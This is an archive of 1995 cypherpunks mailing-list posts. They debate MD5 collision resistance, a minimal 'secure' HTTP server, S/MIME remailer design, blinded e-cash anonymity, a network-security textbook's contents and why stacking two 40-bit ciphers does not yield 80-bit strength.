This is the second time you've implied that an MD5 checksum might not be
as secure as we think.  Could you share your thinking on this?  I had
believed from reading the algorithm that it's not possible to predict how
a change in the input will affect the checksum.  Given a modified version
of netscape for example, how would you change some non-critical portion of
the code to get the same checksum that the original should have.  I suppose
that give n bits of non-critical space in the code, (non-critical meaning
that changing them will have no effect on the execution of the code, and
assuming that you don't want to change the length of the code), that you
could try all possible combinations of those bits, or 2^n trials and
see if you get the correct MD5 checksum.  If you do, then on average you'd
actually only have to try 2^(n-1) trials. What if you don't?  What would
you do then?  MD5 produces a 128 bit output, and it would seem likely that
this would be hard.  As far as I know there are no known attacks for any
MDx algorithms in spite of Ron's worries about MD4.  It's a subject of
on-going research though, and it is only "conjectured that it is
computationally infeasible to produce two messages having the same
message digest, or to produce any messages having a given prespecified
target message digest." (RFC 1321)  So, if you have newer information,
or pointers to any papers, (other than the ben Boer and Bosselaers papers),
could you let me know?

Thanks,

Patrick

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 24 Oct 95 10:10:53 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
In-Reply-To: <9510241549.AA19649@all.net>
Message-ID: <199510241710.NAA18747@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Fred Cohen writes:

> The differences between my secure http server and Netscape's browser
> are quite dramatic, [snip]

No doubt about that.  One's a real product, one's (primarily) a piece
of puffery.


> My get-only server cannot run outside applications, and hence does not
> have the vulnerability of Netscape's browser.  Note also the distinction
> between a server and a browser.

Note in particular the distinction between Fred's server and a real HTTP
server:
It does not run CGI scripts (i.e. no forms support).  It does not have
per-user access control.  It does not have URL mapping.  It cannot
redirect.  All configuration is hard-coded into the binary.  It doesn't
support user directories (e.g. http://site/~yourname).  It doesn't do
server-side includes.  It can't process the HEAD method.  It cannot create
a directory index (if no index.html is present).  It does not support
conditional retrieval (i.e. "If-modified-since").  It is slow (requires
a separate process for each request).  It is initiated by inetd for each
HTTP connection and hence relies on that program's security as well (the
"line-by-line analysis" of inetd is conspicuously missing from Fred's
self-congratulatory whitepaper -- not to mention the OS on which it is
intended to run).  It does not even have the capability to identify the
content type of the retrieved file (apparently you must embed
"Content-type: text/html\n\n" [or whatever] at the beginning of each HTML
source file).

I'm not saying it's completely useless, only that it does not constitute
an HTTP server in the usual sense of the word.  Hence, Fred's continued
boasting of this prodigious feat of programming prowess is complete
bullshit.  And, incidentally, the programming style, with its reliance
on global fixed-length buffers, shared variables, lack of prototypes,
forgotten function arguments, absence of error checking on system call
returns, etc. is more suggestive of a first year CS student than an
alleged PhD, *and* demonstrates a style more typical of a BASIC
programmer than a C programmer.  Don't try this at home, kids; this is
NOT the way to write "secure" software unless your whole program fits
in 80 lines too.


> My get-only server is available in source form, is 80 lines long and
> thus easily understood, has been shown to meet security properties,

[blah blah]

Big deal.  It is the web equivalent of "Hello World".


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@obscura.com (Mixmaster)
Date: Tue, 24 Oct 95 13:11:13 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510242010.NAA15491@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain



To All,

    A theme I have been thinking about lately is a virtual
data haven using a m from n secret splitting scheme via
a DC Net for access and hosting the entire process via HTML
and W3. The salient feature would be database objects split in such a way that participating
sites would possess no more than 1 encrypted slice of any particular
encrypted object. Some redundancy of storage is built into the design and
participating site give up local storage to store other slices
of the datahaven. At no time is the site hosting able to
make correlations of slices to plaintext traffic because the
split is done on the users workstation and the placement of the slice
on the individual slice on the member datahaven site is accomplished with
encrypted remailer tech(probably Mixmaster 2) and CGI or java
scripts. The idea here is to be able to store ANY information on the net
not just what the local bluenoses approve of.

    anon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 24 Oct 95 10:15:03 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241442.AA12411@all.net>
Message-ID: <9510241714.AA22217@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>As to weaknesses, I seem to remember that someone managed to forge a
>modification to a program used to observe networks on a Sun so that it
>had the same MD5 checksum as the official trusted version.  But whether
>this is real is not strictly the issue. 

Ron has not mentioned such an event to me and if that were the case I would 
seriously doubt that he would not have been told about it. The only comment he 
generally makes is that he wrote MD5 because "MD4 was making me nervous".

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to

Netscape do not simply use the MD5 of the message, they are using (as I 
understand it) the PKCS#1 standard for makoing the signature. If not they 
probably have severe problems.

>There has been no limit given by anyone on this list to the level of
>trust they place in MD5.  Several people have posted (without
>contention) that MD5 is sufficiently trustworthy to trust billions of
>dollars in commerce to it's being able to prevent a selected plaintext
>attack as eluded to above. 

NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferable 
in many ways to MD5, it has a different approach to extending the scheduling and 
resist differential cryptanalysis. There is a problem with the compressor 
function of MD5 which I dislike. This is fairly irrelevant though since SSL 
allows other digests to be used.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 24 Oct 95 13:21:00 PDT
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: What is needed for S/MIME remailer ?
In-Reply-To: <9509248145.AA814556043@snail.rsa.com>
Message-ID: <199510242015.NAA20243@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


My understanding of S/MIME isn't excellent, so I figure there are
things I could be confused about which may make this a bit wrong..

I figure a command line S/MIME program which could easily be
integrated into a remailer wouldhave the following features:

A) limit on number of multiple concurrent procersses doing
decryption. Remailer spams have the bad effect of spwaning hundreds of
concurrent PGPs on the mailhost, bringing things to halt. Limiting
number of concurrent decryptions would help this problem.

B) A strong interaction with the UNIX shell, with the program
returning a return code based on whether or not the decryption
succeeded. (Remailers only do decryptions...) That way a remailer
could something like:

#!/bin/sh
if smime -f < incoming-message > /tmp/decrypted.$$
then
  # Process /tmp/decrypted
fi
rm incoming-message
rm /tmp/decrypted.$$

	The option would also be a very low-cruft-output -- there
would be none of that PGP v2.6.2 stuff that PGP sends out. Just the
decrypted output and if the message cant be decrypted, nothing gets
output. (Maybe a -q option for that..)

	I think the smime should be easily plugged into premail as
well, but I don't know premail to know what would be necessary for
that. I suspect Raph would have some input on that matter.


> 
>         The other day I was wondering what it would take to make an
> anonymous remailer for an S/MIME client.  Implementing S/MIME from
> scratch is a lot of work given the lack of a public domain
> implementation, but it seems that a remailer could be built on top
> of a commercial email product that supported S/MIME.  The question
> is: What features should a commercial S/MIME email product have to
> make it easy to support a remailer?  Are there a small set of
> command line options that would greatly simplify a remailer
> implementation?
>                 --Bob Baldwin
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bsmith@gears.efn.org
Date: Tue, 24 Oct 95 06:15:56 PDT
To: cypherpunks@toad.com
Subject: Re: Re[2]: Verification of Registration
In-Reply-To: <9509248145.AA814550885@houston_cc_smtp.hai-net.com>
Message-ID: <199510240456.EAA08458@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 95 09:01:39 EST, you said:

-     Yes
-     
-     wsh
-
-
-______________________________ Reply Separator _________________________________
-Subject: Re: Verification of Registration
-Author:  "Lynne L. Harrison" <lharrison@mhv.net> at internet
-Date:    24-10-95 09:03
-
-
-  Curious.  Did anyone else receive this unsolicitated *invitation*?
-     
-At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
->Your membership registration has been processed.  To become a full member
->of c|net online, please return the text of this message (to verify@cnet.com). 
 (snip)

Yes, I did too. Whats going on? I don't want it....
==============================
*Billy     
*Roseburg, Oregon.USA 
*bsmith@gears.efn.org 
*smith.billy.r@roseburg.va.gov
*MIDI & Machine Guns 
==============================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 24 Oct 95 13:27:51 PDT
To: sameer <sameer@c2.org>
Subject: Re: What is needed for S/MIME remailer ?
In-Reply-To: <199510242015.NAA20243@infinity.c2.org>
Message-ID: <199510242027.NAA14942@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes, among other things:

> A) limit on number of multiple concurrent procersses doing
> decryption. Remailer spams have the bad effect of spwaning hundreds of
> concurrent PGPs on the mailhost, bringing things to halt. Limiting
> number of concurrent decryptions would help this problem.

Agreed.

> B) A strong interaction with the UNIX shell, with the program
> returning a return code based on whether or not the decryption
> succeeded. (Remailers only do decryptions...) That way a remailer
> could something like:

We very much need a command line interface to S/MIME, to use in remailers
and also for other kinds of testing/hacking. I hope one is forthcoming
soon.

> 	I think the smime should be easily plugged into premail as
> well, but I don't know premail to know what would be necessary for
> that. I suspect Raph would have some input on that matter.

Raph does indeed have some input on the matter. I am currently rewriting
premail from the ground up, and am about 700 lines into it. One specific
design goal was the support of other types of encryption, including
Mixmaster and MOSS in the first release, and hopefully others as well.
Basically, I'm waiting on a command line S/MIME implementation as
described above, most hopefully as free software.

In any case, the new premail is _much_ more modular, so plugging in
experimental email stuff should be pretty straightforward.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 10:50:17 PDT
To: jeffb@sware.com (Jeff Barber)
Subject: Re: Does your software?
In-Reply-To: <199510241710.NAA18747@jafar.sware.com>
Message-ID: <9510241747.AA02533@all.net>
MIME-Version: 1.0
Content-Type: text


> Fred Cohen writes:
> 
> > The differences between my secure http server and Netscape's browser
> > are quite dramatic, [snip]
> 
> No doubt about that.  One's a real product, one's (primarily) a piece
> of puffery.

A secure get-only server for those of us who want security and the
normal functions required by most Web users most of the time. 

> > My get-only server cannot run outside applications, and hence does not
> > have the vulnerability of Netscape's browser.  Note also the distinction
> > between a server and a browser.
> 
> Note in particular the distinction between Fred's server and a real HTTP
> server:
> It does not run CGI scripts (i.e. no forms support).

That certainly increases the security.  Actually, we are now experimenting
with an execution server that allows some level of security while running
executables - have you tried using our secure forms interface?  Probably
not.

>  It does not have
> per-user access control.

Actually, it uses TCP wrappers, which provides a different sort of access
control.

>  It does not have URL mapping.

It is a secure, get-only server - as advertised.

>  It cannot
> redirect.

Actually, it does redirect, but not in the way you are used to.

>  All configuration is hard-coded into the binary.

That's one of the ways it is made secure.  If you want to change
configurations, you have to recompile.  Otherwise, dangerous config
changes can easily be made - that would be risky.

>  It doesn't
> support user directories (e.g. http://site/~yourname).

It doesn't allow access to the whole file system, thus gaining
additional protection from configuration errors, misuse, mismanagement,
etc.

>  It doesn't do
> server-side includes.

Get only - that's what it claims and that's what it does.

> It can't process the HEAD method.

Get only - that's what it claims and that's what it does.

>  It cannot create
> a directory index (if no index.html is present).

Get only - that's what it claims and that's what it does.

>  It does not support
> conditional retrieval (i.e. "If-modified-since").

Get only - that's what it claims and that's what it does.

>  It is slow (requires
> a separate process for each request).

Actually, it's faster (I've clocked it) than the NCSA server.

>  It is initiated by inetd for each
> HTTP connection and hence relies on that program's security as well (the
> "line-by-line analysis" of inetd is conspicuously missing from Fred's
> self-congratulatory whitepaper -- not to mention the OS on which it is
> intended to run). 

The claim is that it does not weaken the security provided by the
operating system.  Nothing else.

> It does not even have the capability to identify the
> content type of the retrieved file (apparently you must embed
> "Content-type: text/html\n\n" [or whatever] at the beginning of each HTML
> source file).

Get only - that's what it claims and that's what it does.

> I'm not saying it's completely useless, only that it does not constitute
> an HTTP server in the usual sense of the word.

Right.  It's a SECURE get only http server.  The usual sense of the word
means insecure.

>  Hence, Fred's continued
> boasting of this prodigious feat of programming prowess is complete
> bullshit.

I never boasted it was a prodigious feat at all.  In fact, I published
the fact that it was written in a few hours because I got tired of
worying about and fixing the insecure servers available over the net. 
It is in the process of being proven to meet the security requirements,
which is a prodigous feat (and which I am not doing).

>  And, incidentally, the programming style, with its reliance
> on global fixed-length buffers, shared variables, lack of prototypes,
> forgotten function arguments,

Actually, not true.  The global fixed-length buffers, shared variables,
and lack of prototypes provide protection against allocation problems
which sould result in denial of service, corruptions at near-capacity
load, and other similar security problems.

> absence of error checking on system call
> returns, 

The error checking on system call returns is quite thorough for the
purposes required.  Where no check is done, it is because the check
is not required.

> etc. is more suggestive of a first year CS student than an
> alleged PhD, *and* demonstrates a style more typical of a BASIC
> programmer than a C programmer.

I realize now that you think that all Ph.D.s program like you do, but in
this case, the style of the program is intended to meet the requirement
of the task.  Unlike many who learned in the "structured programming"
method, I believe that different program requirements call for different
programming styles.  This program is in a style suited to the
requirements which include, among other things, verifiability, small
size, ease of unsderstanding, controls on the flow of information,
integrity, availability, confidentiality, and redundancy.  But at any
rate, there's no accounting for taste.

>  Don't try this at home, kids; this is
> NOT the way to write "secure" software unless your whole program fits
> in 80 lines too.

If it doesn't, it's probably going to be very hard to demonstrate security.

> > My get-only server is available in source form, is 80 lines long and
> > thus easily understood, has been shown to meet security properties,
> 
> [blah blah]
> 
> Big deal.  It is the web equivalent of "Hello World".

Yet it services more than one request per minute, 24 hours, 7 days, and
has done so without denial of services, corruption, or leakage since its
first implementation.  It's so small it can be verified, it's faster
than the retail brand, and it doesn't have all the holes we keep finding
in tho other servers.  Different strokes for different folks.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 24 Oct 95 14:04:22 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232350.QAA17025@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951024133910.26964D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Hal wrote:

> This is an interesting idea but it is more complicated than necessary, I
> think.  The denomination can be carried in the exponent, in which case
> there is no need for cut and choose and nobody can cheat the bank.  A
> coin suitable for deposit is a signed number of some special form.  To
> pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
> gives her a blinded coin, which she reblinds and gives to the bank.  The
> bank signs it (debiting Alice's account) and gives it back to her.  She
> strips off her blinding and gives it to Bob.  He strips off his own
> blinding and verfifies that he is left with a signed number of the
> appropriate form.

Using the above protocol, payee anonymity will not be compromised by 
collusion between the bank and the payer, but the payee and the bank can 
collude to identify the payer!  (This reverses the situation in normal 
Chaumian ecash, and of course in certain circumstances may be preferable.)

This collusion can succeed even if Alice (the payer) reblinds the coin 
she gets from Bob before asking the bank to sign it, because Alice must 
withdraw the coin after Bob gives it to her and before returning it to Bob.  
Bob can ask the bank to record the names of everyone who withdrew money 
during that period, and after two or three repeated transactions can 
narrow the list of possible payers down to one person.  (This is reminescent 
of the time-correlation attack on remailers.)  In the original protocol 
this isn't possible because Alice can withdraw the money ahead of time.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:52:29 1999
Subject: No Subject
Message-ID: <ea8c857ce980a5a1f2aa74a5a20dce97@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


It is interesting that the situation is so symmetrical.  Given
collusion with the bank by the other party, with regular ecash we
protect Alice's but not Bob's anonymity.  With this "reverse ecash" we
protect Bob but not Alice.  (Alice is the payor, Bob the payee.)

If people were allowed to exchange coins anonymously, either system
will provide anonymity for both parties.  (In the reverse ecash system
Alice hands the the blinded proto-coins along with some regular coins
to the bank and receives blinded new coins.)

Earlier there was discussion of an ecash coin-exchanging service
("Charlie") designed to provide payee anonymity in the regular ecash
system.  Bob would send his newly-received coins to Charlie along with
blinded proto-coins.  Charlie would then exchange them at the bank and
send the new (blinded) coins back to Bob.  Charlie and Bob can be
anonymous to each other, but Bob has to trust Charlie with his coins.

A similar service would work for the reverse ecash system to protect
Alice's anonymity.  Bob blinds some proto-coins and sends them to
Alice, who further blinds them and sends them to Charlie along with
some regular coins of the same values.  Charlie exchanges the regular
coins for new coins using the doubly blinded proto-coins.  He gives the
blinded coins back to Alice, who unblinds them and gives them to Bob,
who removes the last blinding to reveal the valid coins.  It is Alice
in this protocol who has to trust Charlie with her coins.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 24 Oct 95 12:10:25 PDT
To: x85849i1@cadet1.usma.edu
Subject: Re: Verification of Registration
In-Reply-To: <9510241456.AA25959@trotter.usma.edu>
Message-ID: <199510241909.PAA03898@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Raymond Val" writes:
>Lynne L. Harrison writes:
>
>>  Curious.  Did anyone else receive this unsolicitated *invitation*?
>
>Everybody who receives mail from cypherpunks@toad.com received this
>message becuase the message was addressed to 
>cypherpunks@toad.com.  Apparently someone may have 
>joined this 'group' or service and used the cypherpunks address as 
>the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
>userid/password. 
>
>This would be my guess, of course.

Mine too.
>
>Does anybody know what this service does?

C|NET Central is a cable TV show which reports on the 'net.  The
service is their on-line address where you can get more details
on stuff they report.

Doesn't seem to be especially c-punks related, but I guess someone
didn't like the idea of having to reveal his identity just to look
at a web page.  You can probably assume that the password for the
"cypherpunks" userid on the server is either "cypherpunks" or
"writecode".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 14:25:37 PDT
To: sandoval@cic.teleco.ulpgc.es
Subject: Re: textbooks
Message-ID: <9510242121.AA07455@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm Cc:ing this to cypherpunks since I've gotten a lot of requests for this
information.

> From: sandoval@cic.teleco.ulpgc.es (Juan Domingo Sandoval Gonzalez)
> 
> Dear Patrick,
> Thanks for yor info about "Network Security Private Communication
> in a PUBLIC World" by Kaufman, Perlman and Speciner.
> To buy it I need to know Who published it.
> Do you know the Editor house?
> 

"Network Security - PRIVATE Communication in a PUBLIC World", 1995, Prentice
Hall PTR, ISBN 0-13-061466-1, by Charlie Kaufman, Radia Perlman, and Mike
Speciner.

This book is amazing.  It explains hard concepts in ways that make them
seem obvious.  I can't state this too emphatically.  The style of the
book is conversational, approachable and a fun read, while at the same
time maintaining technical exactness to the point that you can implement
algorithms from the discussions in this book, (and understand how they
work.)

17.6.2 Coping with Export Controls is very interesting, detailing the weird
hoops that Lotus jumped through to retain as much security as possible while
still meeting export requirements.  The authors make the point that what
happens to you when you go through this process is almost random depending
on the times as well as the individual person you deal with.

The ANS.1 section is blunt about the space problems, and indeed much of the
book is refreshingly blunt about the stupidities involved in a lot of this
stuff.

The quick proof of why the initial and final permutations add nothing to 
the security of DES is presented in an informal and quite obvious sidebar.
The comment is made that by the same argument the permutation of the key
in the generating of per-round keys also adds nothing to security.

It also includes homework and would be a wonderful textbook.

Here's an abbreviated version of the TOC.  Note that the real index is much
richer than this.  I've given the complete version of section 3.3 to
illustrate.  All typos are mine.  I think we can no longer refer to Bruce's
book as the Bible, but must refer to the two books as the Scriptures;)

Could someone refer me to some good crypto oriented math books?  Preferably
something as readable as this:)

Chapter 1 Introduction

1.1  Roadmap to the book
1.2  What type of book is this
1.3  Terminology
1.4  Notation
1.5  Primer on Networking
1.6  Tempest
1.7  Firewalls/Security Gateways
1.8  Key Escrow for Law Enforcement
1.9  Key Escrow for Careless Users
1.10 Viruses, Worms, Trojan Horses
1.11 The Military Model of Security
1.12 Legal Issues

Chapter 2 Introduction to Cryptography

2.1  What is Cryptography
2.2  Breaking an Encryption Scheme
2.3  Types of Cryptographic Functions
2.4  Secret Key Cryptography
2.5  Public Key Cryptography
2.6  Hash Alogorithms
2.7  Homework

Chapter 3 Secret Key Cryptography

3.1  Introduction
3.2  Generic Block Encryption
3.3  Data Encryption Standard (DES)
     3.3.1  DES Overview
     3.3.2  The Permutations of the Data
     3.3.3  Generating the Per-Round Keys
     3.3.4  A DES Round
     3.3.5  The Mangler Function
     3.3.6  Weak and Semi-Weak Keys
     3.3.7  What's So Special About DES?
3.4  International Data Encryption Algorithm (IDEA)
3.5  Using Secret Key Cryptography in Protocols
3.6  Encrypting a Large Message
3.7  Generating MICs
3.8  Multiple Encryption DES
3.9  Homework

Chapter 4 Hashes and Message Digests

4.1  Introduction
4.2  Nifty Things to Do with a Hash
4.3  MD2
4.4  MD4
4.5  MD5
4.6  SHS
4.7  Homework

Chapter 5 Public Key Algorithms
5.1  Introduction
5.2  Modular Arithmatic
5.3  RSA
5.4  Diffie-Hellman
5.5  Digital Signature Standard (DSS)
5.6  Zero Knowledge Proof Systems
5.7  Homework Problems

Chapter 6  Number Theory

6.1  Introduction
6.2  Modular Arithmatic
6.3  Primes
6.4 Euclid's Algorithm
6.5  Chinese Remainder Theorem
6.6  Zn*
6.7  Euler's Totient Function
6.8  Euler's Theorem
6.9  Homework Problems

Chapter 7 Authentication Problems

7.1  Password-Based Authentication
7.2  Address-Based Authentication
7.3  Cryptographic Authentication Protocols
7.4  Who is Being Authenticated
7.5  Passwords as Cryptographic Keys
7.6  Eavesdropping and Server Database Reading
7.7  Trusted Intermediaries
7.8  Session Key Establishment
7.9  Authorization
7.10 Delegation
7.11 Homework

Chapter 8 Authentication of People

8.1 Passwords
8.2  On-Line Password Guessing
8.3  Off-Line Password Guessing
8.4  How Big Should a Secret Be?
8.5  Eavesdropping
8.6  Passwords and Careless Users
8.7  Initial Password Distribution
8.8  Authentication Tokens
8.9  Physical Access
8.10 Biometrics
8.11 Homework

Chapter 9 Security Handshake Pitfalls

9.1  Login Only
9.2  Mutual Authentication
9.3  Integrity/Encryption for Data
9.4  Mediated Authentication (with KDC)
9.5  Bellovin-Merritt
9.6  Network Login and Password Guessing
9.7  Nonce Types
9.8  Picking Random Numbers
9.9  X.509 Problem
9.10 Performance Considerations
9.11 Authentication Protocol Checklist
9.12 Homework

Chapter 10 Kerberos V4

10.1 Introduction
10.2 Tickets and Ticket-Granting Tickets
10.3  Configuration
10.4  Logging Into the Network
10.5  Replicated KDCs
10.6  Realms
10.7  Interrealm Authentication
10.8  Key Version Numbers
10.9  Encryption for Privacy and Integrity
10.10 Encryption for Integrity Only
10.11 Network Layer Addresses in Tickets
10.12 Message Formats
10.13 Homework

Chapter 11 Kerberos V5

11.1  ASN.1
11.2  Names
11.3  Delegation of Rights
11.4  Ticket Lifetimes
11.5  Key Versions
11.6  Making Master Keys in Different Realms Different
11.7  Optimizations
11.8  Cryptographic Algorithms
11.9  Hierarchy of Realms
11.10 Evading Password-Guessing Attacks
11.11 Key Inside Authenticator
11.12 Double TGT Authentication
11.13 KDC Database
11.14 Kerberos V5 Messages
11.15 Homework

Chapter 12 Electronic Mail Security

12.1  Distribution Lists
12.2  Store and Forward
12.3  Security Services for Electronic Mail
12.4  Establishing Keys
12.5  Privacy
12.6  Authentication of the Source
12.7  Message Integrity
12.8  Non-Repudiation
12.9  Proof of Submission
12.10 Proof of Delivery
12.11 Message Flow Confidentiality
12.12 Anonymity
12.13 Containment
12.14 Annoying Text Format Issues
12.15 Names and Addresses
12.16 Old Messages
12.17 Homework

Chapter 13 Privacy Enhanced Mail (PEM)

13.1  Introduction
13.2  Establishing Keys
13.3  Some PEM History
13.4  Certificate Hierarchy
13.5  Certificate Revocation Lists (CRLs)
13.6  X.509 Certificates and CRLs
13.7  Reformatting Data to Get Through Mailers
13.8  General Structure of a PEM Message
13.9  Encryption
13.10 Source Authentication and Integrity Protection
13.11 Multiple Recipients
13.12 Bracketing PEM Messages
13.13 Remote Distribution List Exploders
13.14 Forwarding and Enclosures
13.15 Canonicalization
13.16 Unprotected Information
13.17 Message Formats
13.18 DES-CBC as MIC Doesn't Work
13.19 Homework

Chapter 14 PGP (Pretty Good Privacy)

14.1  Introduction
14.2  Overview
14.3  Key Distribution
14.4  Efficient Encoding
14.5  Certificate and Key Revocation
14.6  Signature Types
14.7  Your Private Key
14.8  Key Rings
14.9  Anomalies
14.10 Object Formats

Chapter 15 X.400

15.1  Overview of X.400
15.2  Security Functions Possible with X.400
15.3  Structure of an X.400 Message

Chapter 16 A Comparison of PEM, PGP, and X.400

16.1  Introduction
16.2  Certificate Hierarchy
16.3  Certificate Distribution
16.4  Encryption
16.5  Encoding of Transmitted Messages
16.6  Cryptographic Algorithms Supported
16.7  Recipients with Multiple Keys
16.8  Mail-Intermediary-Provided Functions

Chapter 17 More Security Systems

17.1  NetWare V3
17.2  NetWare V4
17.3  KryptoKnight
17.4  SNMP
17.5  DASS/SPX
17.6  Lotus Notes Security
17.7  DCE Security
17.8  Microsoft Security
17.9  Network Denial of Service
17.10 Clipper
17.11 Homework

Bibliography
Glossary
Index
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 24 Oct 95 14:21:57 PDT
To: cypherpunks@toad.com
Subject: Pointer to article on ex parte search & sezure
Message-ID: <Pine.ULT.3.91.951024141738.16343F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


That's where somebody, e.g. Microsoft or the Church of Scientology, gets 
US Federal Marshals to seize your computer.

Article <46j4t6$6od@newsbf02.news.aol.com> in alt.religion.scientology is 
a good article by Adam S. Bauman of the Los Angeles Times. You might find 
it interesting, but not quite relevant enough to post the whole thing 
here.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 24 Oct 95 11:21:08 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
Message-ID: <acb2e00c09021004a7ac@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



>My get-only server is available in source form, is 80 lines long and
>thus easily understood, has been shown to meet security properties, is
>now in the process of being mathematically proven to meet those
>properties, and is published in a refereed journal which can be used to
>confirm its contents in detail.  Hence, I do provide secure distribution
>through purely physical means.
>
Uh, proofs only go so far. There was one Cornell CS professor who was a
real devotee of "proving" your programs correct. He even published one of
his proofs in a "refereed" journal. Big whoop. It still had an error.

Proofs can help identify flaws, but they can never rule out all flaws.
That's why their name is so bogus. I wouldn't be surprised if you could
prove that the Finger daemon, which is sort of like a really low-level
GET-ONLY HTTP server, is also safe. In fact, your math proving ability
could probably even prove the pre-Robert Morris finger daemon is safe and
secure. If programmers don't think of preventing finger requests longer
that 512 bytes then why should the head-in-the-clouds program provers?

- Peter


>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

P.S. "FC" is your log in and "FC is found inscribed in the writings of the
Unabomber. Coincidence?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 24 Oct 95 14:39:46 PDT
To: cypherpunks@toad.com
Subject: 80 bits from 40 bits -- NOT
Message-ID: <9509248145.AA814570684@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Well, let me eat my words.  Unless all layers turn on
encryption at the same time, and there is not predictable text
that passes from one layer to the next, adding encryption at
each layer cannot substantially improve the size of the key
space.  Consider two layers each of which has a verifiable
header and a body of encrypted text.  By "verifyable", I mean
that it contains enough redundancy to recognize a correct
decryption of the cipher added by the lower layer.  For example,
a header that included a content type field and a length field
could be examined to see if it looked reasonable, and thus
confirm a guess at the lower level's cipher.


                Plaintext-Body-1
                      |
                 Layer-1-cipher
                      |
      Header-1, Encrypted-Body-1
               |
            Layer-2-cipher
                   |
   Header-2, Encrypted-Body-2

        To crack this system, an attacker does brute force search
of the keyspace for the layer-2-cipher, for each key check the
decrypted Header-1 value to see if it looks OK, if not, continue,
otherwise start searching the keyspace for the Layer-1-cipher
given the candidate for the Encrypted-Body-1 produced by the
guess at the Layer-2-cipher key.  Clearly, if you have several
layer 2 blocks and they all have good looking values for the
Header-1, then the Layer-2-cipher key is correct.

        The summary is that two layers of 40 bit ciphers with
the first layer adding some verifiable information, has the effect
of adding at most one bit to the effective keysize (doubling the
amount of work).  It DOES NOT increase the keysize to 80 bits.
                --Bob Baldwin


______________________________ Reply Separator _________________________________
Subject: 80 bit security from 40 bit exportable products
Author:  "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> at INTERNET
Date:    10/24/95 10:52 AM

        Long ago vendors should have put encryption into network layer
products, but for a variety of reasons that effort was delayed or 
